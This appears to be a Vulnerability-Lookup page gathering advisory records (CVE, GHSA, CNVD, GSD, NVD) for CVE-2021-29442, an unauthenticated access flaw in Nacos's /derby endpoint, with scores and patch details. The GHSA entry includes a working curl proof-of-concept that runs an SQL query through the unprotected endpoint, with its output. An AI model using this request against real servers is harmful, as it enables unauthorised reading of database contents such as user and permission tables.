Vulnerability-Lookup

CVE-2021-29442 (GCVE-0-2021-29442)

Vulnerability from cvelistv5 – Published: 2021-04-27 20:20 – Updated: 2024-08-03 22:02

Title

Authentication bypass

Summary

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)

Severity ?

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	alibaba	nacos	Affected: < 1.4.1

GHSA-XV5H-V7JH-P2QH

Vulnerability from github – Published: 2021-04-27 20:09 – Updated: 2021-05-10 15:11

Summary

Authentication bypass for specific endpoint

Details

The ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.

For example, the following request will list the tables of the database:

❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
{"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}%

These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.alibaba.nacos:nacos-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-29442"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-27T20:08:49Z",
    "nvd_published_at": "2021-04-27T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. \n\nFor example, the following request will list the tables of the database:\n```\n\u276f curl -X GET \u0027http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st\u0027\n{\"code\":200,\"message\":null,\"data\":[{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_PUBS\"},{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_SUBS\"},{\"TABLENAME\":\"APP_LIST\"},{\"TABLENAME\":\"CONFIG_INFO\"},{\"TABLENAME\":\"CONFIG_INFO_AGGR\"},{\"TABLENAME\":\"CONFIG_INFO_BETA\"},{\"TABLENAME\":\"CONFIG_INFO_TAG\"},{\"TABLENAME\":\"CONFIG_TAGS_RELATION\"},{\"TABLENAME\":\"GROUP_CAPACITY\"},{\"TABLENAME\":\"HIS_CONFIG_INFO\"},{\"TABLENAME\":\"PERMISSIONS\"},{\"TABLENAME\":\"ROLES\"},{\"TABLENAME\":\"SYSALIASES\"},{\"TABLENAME\":\"SYSCHECKS\"},{\"TABLENAME\":\"SYSCOLPERMS\"},{\"TABLENAME\":\"SYSCOLUMNS\"},{\"TABLENAME\":\"SYSCONGLOMERATES\"},{\"TABLENAME\":\"SYSCONSTRAINTS\"},{\"TABLENAME\":\"SYSDEPENDS\"},{\"TABLENAME\":\"SYSDUMMY1\"},{\"TABLENAME\":\"SYSFILES\"},{\"TABLENAME\":\"SYSFOREIGNKEYS\"},{\"TABLENAME\":\"SYSKEYS\"},{\"TABLENAME\":\"SYSPERMS\"},{\"TABLENAME\":\"SYSROLES\"},{\"TABLENAME\":\"SYSROUTINEPERMS\"},{\"TABLENAME\":\"SYSSCHEMAS\"},{\"TABLENAME\":\"SYSSEQUENCES\"},{\"TABLENAME\":\"SYSSTATEMENTS\"},{\"TABLENAME\":\"SYSSTATISTICS\"},{\"TABLENAME\":\"SYSTABLEPERMS\"},{\"TABLENAME\":\"SYSTABLES\"},{\"TABLENAME\":\"SYSTRIGGERS\"},{\"TABLENAME\":\"SYSUSERS\"},{\"TABLENAME\":\"SYSVIEWS\"},{\"TABLENAME\":\"TENANT_CAPACITY\"},{\"TABLENAME\":\"TENANT_INFO\"},{\"TABLENAME\":\"USERS\"}]}% \n```\n\nThese endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
  "id": "GHSA-xv5h-v7jh-p2qh",
  "modified": "2021-05-10T15:11:26Z",
  "published": "2021-04-27T20:09:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29442"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/nacos/issues/4463"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/nacos/pull/4517"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Authentication bypass for specific endpoint"
}

CNVD-2021-34116

Vulnerability from cnvd - Published: 2021-05-12

Title

Alibaba Nacos访问控制错误漏洞

Description

nacos是中国阿里巴巴（Alibaba）的一个动态服务发现、配置和服务管理平台。该软件支持基于DNS和基于RPC的服务发现，可提供提供实时健康检查，阻止服务向不健康的主机或服务实例发送请求等功能。在版本1.4.1之前的Nacos中，ConfigOpsController允许用户执行管理操作，例如查询数据库，甚至清除数据库。虽然/data/remove端点使用@Secured注解得到了正确的保护，但是/derby端点未受保护，未经身份验证的攻击者可利用该漏洞公开访问。

Severity

中

Patch Name

Alibaba Nacos访问控制错误漏洞的补丁

Patch Description

Formal description

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载https://github.com/advisories/GHSA-36hp-jr8h-556f

Reference

https://github.com/alibaba/nacos/issues/4463

Impacted products

Name
Alibaba Nacos <1.4.1

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2021-29442",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2021-29442"
    }
  },
  "description": "nacos\u662f\u4e2d\u56fd\u963f\u91cc\u5df4\u5df4\uff08Alibaba\uff09\u7684\u4e00\u4e2a\u52a8\u6001\u670d\u52a1\u53d1\u73b0\u3001\u914d\u7f6e\u548c\u670d\u52a1\u7ba1\u7406\u5e73\u53f0\u3002\u8be5\u8f6f\u4ef6\u652f\u6301\u57fa\u4e8eDNS\u548c\u57fa\u4e8eRPC\u7684\u670d\u52a1\u53d1\u73b0\uff0c\u53ef\u63d0\u4f9b\u63d0\u4f9b\u5b9e\u65f6\u5065\u5eb7\u68c0\u67e5\uff0c\u963b\u6b62\u670d\u52a1\u5411\u4e0d\u5065\u5eb7\u7684\u4e3b\u673a\u6216\u670d\u52a1\u5b9e\u4f8b\u53d1\u9001\u8bf7\u6c42\u7b49\u529f\u80fd\u3002\n\n\u5728\u7248\u672c1.4.1\u4e4b\u524d\u7684Nacos\u4e2d\uff0cConfigOpsController\u5141\u8bb8\u7528\u6237\u6267\u884c\u7ba1\u7406\u64cd\u4f5c\uff0c\u4f8b\u5982\u67e5\u8be2\u6570\u636e\u5e93\uff0c\u751a\u81f3\u6e05\u9664\u6570\u636e\u5e93\u3002\u867d\u7136/data/remove\u7aef\u70b9\u4f7f\u7528@Secured\u6ce8\u89e3\u5f97\u5230\u4e86\u6b63\u786e\u7684\u4fdd\u62a4\uff0c\u4f46\u662f/derby\u7aef\u70b9\u672a\u53d7\u4fdd\u62a4\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u516c\u5f00\u8bbf\u95ee\u3002",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7dhttps://github.com/advisories/GHSA-36hp-jr8h-556f",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2021-34116",
  "openTime": "2021-05-12",
  "patchDescription": "nacos\u662f\u4e2d\u56fd\u963f\u91cc\u5df4\u5df4\uff08Alibaba\uff09\u7684\u4e00\u4e2a\u52a8\u6001\u670d\u52a1\u53d1\u73b0\u3001\u914d\u7f6e\u548c\u670d\u52a1\u7ba1\u7406\u5e73\u53f0\u3002\u8be5\u8f6f\u4ef6\u652f\u6301\u57fa\u4e8eDNS\u548c\u57fa\u4e8eRPC\u7684\u670d\u52a1\u53d1\u73b0\uff0c\u53ef\u63d0\u4f9b\u63d0\u4f9b\u5b9e\u65f6\u5065\u5eb7\u68c0\u67e5\uff0c\u963b\u6b62\u670d\u52a1\u5411\u4e0d\u5065\u5eb7\u7684\u4e3b\u673a\u6216\u670d\u52a1\u5b9e\u4f8b\u53d1\u9001\u8bf7\u6c42\u7b49\u529f\u80fd\u3002\r\n\r\n\u5728\u7248\u672c1.4.1\u4e4b\u524d\u7684Nacos\u4e2d\uff0cConfigOpsController\u5141\u8bb8\u7528\u6237\u6267\u884c\u7ba1\u7406\u64cd\u4f5c\uff0c\u4f8b\u5982\u67e5\u8be2\u6570\u636e\u5e93\uff0c\u751a\u81f3\u6e05\u9664\u6570\u636e\u5e93\u3002\u867d\u7136/data/remove\u7aef\u70b9\u4f7f\u7528@Secured\u6ce8\u89e3\u5f97\u5230\u4e86\u6b63\u786e\u7684\u4fdd\u62a4\uff0c\u4f46\u662f/derby\u7aef\u70b9\u672a\u53d7\u4fdd\u62a4\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u516c\u5f00\u8bbf\u95ee\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Alibaba Nacos\u8bbf\u95ee\u63a7\u5236\u9519\u8bef\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Alibaba Nacos \u003c1.4.1"
  },
  "referenceLink": "https://github.com/alibaba/nacos/issues/4463",
  "serverity": "\u4e2d",
  "submitTime": "2021-04-28",
  "title": "Alibaba Nacos\u8bbf\u95ee\u63a7\u5236\u9519\u8bef\u6f0f\u6d1e"
}

GSD-2021-29442

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2021-29442

Aliases

CVE-2021-29442

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-29442",
    "description": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
    "id": "GSD-2021-29442"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-29442"
      ],
      "details": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
      "id": "GSD-2021-29442",
      "modified": "2023-12-13T01:23:36.384455Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2021-29442",
        "STATE": "PUBLIC",
        "TITLE": "Authentication bypass"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "nacos",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "\u003c 1.4.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "alibaba"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)"
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-306 Missing Authentication for Critical Function"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/alibaba/nacos/issues/4463",
            "refsource": "MISC",
            "url": "https://github.com/alibaba/nacos/issues/4463"
          },
          {
            "name": "https://github.com/advisories/GHSA-36hp-jr8h-556f",
            "refsource": "CONFIRM",
            "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
          },
          {
            "name": "https://github.com/alibaba/nacos/pull/4517",
            "refsource": "MISC",
            "url": "https://github.com/alibaba/nacos/pull/4517"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-xv5h-v7jh-p2qh",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "(,1.4.1)",
          "affected_versions": "All versions before 1.4.1",
          "cvss_v2": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "cwe_ids": [
            "CWE-1035",
            "CWE-306",
            "CWE-937"
          ],
          "date": "2021-05-07",
          "description": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos, the `ConfigOpsController` lets the user perform management operations like querying the database or even wiping it out. While the `/data/remove` endpoint is properly protected with the `@Secured` annotation, the `/derby` endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).",
          "fixed_versions": [
            "1.4.1"
          ],
          "identifier": "CVE-2021-29442",
          "identifiers": [
            "CVE-2021-29442",
            "GHSA-36hp-jr8h-556f"
          ],
          "not_impacted": "All versions starting from 1.4.1",
          "package_slug": "maven/com.alibaba.nacos/nacos-api",
          "pubdate": "2021-04-27",
          "solution": "Upgrade to version 1.4.1 or above.",
          "title": "Missing Authentication for Critical Function",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2021-29442"
          ],
          "uuid": "31045b36-781a-41f9-90b8-b3a0ab03de1a"
        },
        {
          "affected_range": "(,1.4.1)",
          "affected_versions": "All versions before 1.4.1",
          "cvss_v2": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "cwe_ids": [
            "CWE-1035",
            "CWE-306",
            "CWE-937"
          ],
          "date": "2021-05-10",
          "description": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
          "fixed_versions": [
            "1.4.1"
          ],
          "identifier": "CVE-2021-29442",
          "identifiers": [
            "GHSA-xv5h-v7jh-p2qh",
            "CVE-2021-29442"
          ],
          "not_impacted": "All versions starting from 1.4.1",
          "package_slug": "maven/com.alibaba.nacos/nacos-common",
          "pubdate": "2021-04-27",
          "solution": "Upgrade to version 1.4.1 or above.",
          "title": "Missing Authentication for Critical Function",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2021-29442",
            "https://github.com/alibaba/nacos/issues/4463",
            "https://github.com/alibaba/nacos/pull/4517",
            "https://github.com/advisories/GHSA-36hp-jr8h-556f",
            "https://github.com/advisories/GHSA-xv5h-v7jh-p2qh"
          ],
          "uuid": "0a8a1a11-851e-4663-ae20-b780c88977e2"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.4.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2021-29442"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-306"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/alibaba/nacos/issues/4463",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/alibaba/nacos/issues/4463"
            },
            {
              "name": "https://github.com/alibaba/nacos/pull/4517",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/alibaba/nacos/pull/4517"
            },
            {
              "name": "https://github.com/advisories/GHSA-36hp-jr8h-556f",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2021-05-07T15:37Z",
      "publishedDate": "2021-04-27T21:15Z"
    }
  }
}

FKIE_CVE-2021-29442

Vulnerability from fkie_nvd - Published: 2021-04-27 21:15 - Updated: 2024-11-21 06:01

Severity ?

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/advisories/GHSA-36hp-jr8h-556f	Exploit, Third Party Advisory
security-advisories@github.com	https://github.com/alibaba/nacos/issues/4463	Exploit, Third Party Advisory
security-advisories@github.com	https://github.com/alibaba/nacos/pull/4517	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/advisories/GHSA-36hp-jr8h-556f	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/alibaba/nacos/issues/4463	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/alibaba/nacos/pull/4517	Patch, Third Party Advisory

Impacted products

	Vendor	Product	Version
	alibaba	nacos	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "167EF403-0A27-4951-83BF-0BE274BBA6B7",
              "versionEndExcluding": "1.4.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)"
    },
    {
      "lang": "es",
      "value": "Nacos es una plataforma dise\u00f1ada para el descubrimiento y la configuraci\u00f3n din\u00e1mica de servicios y la administraci\u00f3n de servicios.\u0026#xa0;En Nacos versiones anteriores a 1.4.1, la funci\u00f3n ConfigOpsController permite al usuario llevar a cabo operaciones de administraci\u00f3n como consultar la base de datos o incluso borrarla.\u0026#xa0;Si bien el endpoint /data/remove est\u00e1 protegido apropiadamente con la anotaci\u00f3n @Secured, el endpoint /derby no est\u00e1 protegido y los usuarios no autenticados pueden acceder a \u00e9l abiertamente.\u0026#xa0;Estos endpoints solo son v\u00e1lidos cuando se usa almacenamiento integrado (derby DB), por lo que este problema no deber\u00eda afectar las instalaciones que usan almacenamiento externo (por ejemplo, mysql)"
    }
  ],
  "id": "CVE-2021-29442",
  "lastModified": "2024-11-21T06:01:06.423",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-27T21:15:08.030",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/alibaba/nacos/issues/4463"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/alibaba/nacos/pull/4517"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/alibaba/nacos/issues/4463"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/alibaba/nacos/pull/4517"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-29442 (GCVE-0-2021-29442)

GHSA-XV5H-V7JH-P2QH

CNVD-2021-34116

GSD-2021-29442

FKIE_CVE-2021-29442

Tags

Sightings

Nomenclature